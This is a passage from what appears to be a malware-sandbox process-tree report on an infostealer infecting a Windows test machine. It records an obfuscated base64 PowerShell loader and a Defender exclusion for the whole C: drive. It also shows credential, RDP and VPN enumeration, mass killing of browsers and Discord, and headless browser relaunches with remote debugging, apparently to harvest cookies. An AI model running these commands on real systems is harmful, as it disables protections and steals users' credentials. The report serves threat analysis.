dD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2194519399.txt\""6⤵
- NTFS ADS
PID:2976
-
-
C:\Windows\system32\net.exe"net" statistics workstation6⤵
- Suspicious use of WriteProcessMemory
PID:5784 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation7⤵PID:1676
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list6⤵PID:1900
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5368
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵PID:5892
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list7⤵PID:5468
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
C:\Windows\system32\certutil.exe"certutil" -store My6⤵PID:4664
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My6⤵PID:3300
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5780
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "6⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5476
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6048
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵PID:5276
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.746⤵PID:4408
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5832
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5956
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5276
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5800
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵PID:1996
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe6⤵
- Kills process with taskkill
PID:4928
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe6⤵PID:1136
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe6⤵
- Kills process with taskkill
PID:4500
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe6⤵PID:6088
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe6⤵PID:2148
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe6⤵
- Kills process with taskkill
PID:2944
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe6⤵
- Kills process with taskkill
PID:5880
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe6⤵
- Kills process with taskkill
PID:1292
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe6⤵
- Kills process with taskkill
PID:3284
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe6⤵
- Kills process with taskkill
PID:5044
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe6⤵
- Kills process with taskkill
PID:4664
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe6⤵
- Kills process with taskkill
PID:2328
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe6⤵
- Kills process with taskkill
PID:2448
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe6⤵
- Kills process with taskkill
PID:1928
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe6⤵PID:3088
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe6⤵
- Kills process with taskkill
PID:452
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"6⤵
- Enumerates processes with tasklist
PID:5628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=44725 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default6⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5632 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffedcdfdcf8,0x7ffedcdfdd04,0x7ffedcdfdd107⤵PID:6060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2432,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2424 /prefetch:27⤵
- Modifies registry class
PID:2584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2836,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2676 /prefetch:37⤵PID:4452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=3188,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3180 /prefetch:87⤵PID:2004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44725 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3676,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3668 /prefetch:17⤵
- Uses browser remote debugging
PID:4500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44725 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3984,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3276 /prefetch:17⤵
- Uses browser remote debugging
PID:1676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=44725 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3796,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3792 /prefetch:17⤵
- Uses browser remote debugging
PID:2276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4596,i,1088654119459710741,18073866200449798372,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4592 /prefetch:87⤵PID:5360
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"6⤵
- Enumerates processes with tasklist
PID:2072
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"6⤵
- Enumerates processes with tasklist
PID:4540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=46919 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default6⤵
- Uses browser remote debugging
PID:3656 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=46919 --remote-allow-origins=* --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --edge-skip-compat-layer-relaunch7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6056 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x22c,0x230,0x234,0x228,0x23c,0x7ffeda14f208,0x7ffeda14f214,0x7ffeda14f2208⤵PID:6012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2224,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:28⤵
- Modifies registry class
PID:6224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2668,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2964 /prefetch:38⤵PID:6372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3216,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3208 /prefetch:88⤵PID:6388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=46919 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:18⤵
- Uses browser remote debugging
PID:6416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=46919 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=4012,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:18⤵
- Uses browser remote debugging
PID:6504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4872,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:88⤵PID:6848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4984,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:88⤵PID:6856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5508,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:88⤵PID:7108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5508,i,11184318886673806808,3641156954948704162,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:88⤵PID:7148
-
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"6⤵
- Enumerates processes with tasklist
PID:5128
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe6⤵PID:2004
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe6⤵
- Kills process with taskkill
PID:3592
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe6⤵
- Kills process with taskkill
PID:5952
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe6⤵PID:916
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe6⤵
- Kills process with taskkill
PID:2276
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe6⤵PID:2692
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe6⤵
- Kills process with taskkill
PID:2996
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe6⤵
- Kills process with taskkill
PID:6244
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe6⤵
- Kills process with taskkill
PID:6320
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe6⤵PID:7448
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe6⤵
- Kills process with taskkill
PID:7604
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe6⤵
- Kills process with taskkill
PID:3512
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe6⤵PID:7708
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe6⤵PID:4388
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe6⤵PID:8036
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe6⤵
- Kills process with taskkill
PID:7660
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe6⤵PID:556
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe6⤵
- Kills process with taskkill
PID:7988
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵PID:5604
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe6⤵
- Kills process with taskkill
PID:4384
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe6⤵
- Kills process with taskkill
PID:1500
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe6⤵
- Kills process with taskkill
PID:5248
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe6⤵
- Kills process with taskkill
PID:2008
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe6⤵PID:1336
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe6⤵
- Kills process with taskkill
PID:696
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe6⤵
- Kills process with taskkill
PID:6392
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe6⤵
- Kills process with taskkill
PID:7452
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe6⤵
- Kills process with taskkill
PID:1092
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe6⤵
- Kills process with taskkill
PID:6496
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe6⤵
- Kills process with taskkill
PID:6620
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe6⤵
- Kills process with taskkill
PID:7196
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe6⤵
- Kills process with taskkill
PID:5348
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe6⤵
- Kills process with taskkill
PID:6152
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe6⤵PID:6432
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe6⤵
- Kills process with taskkill
PID:6784
-
-
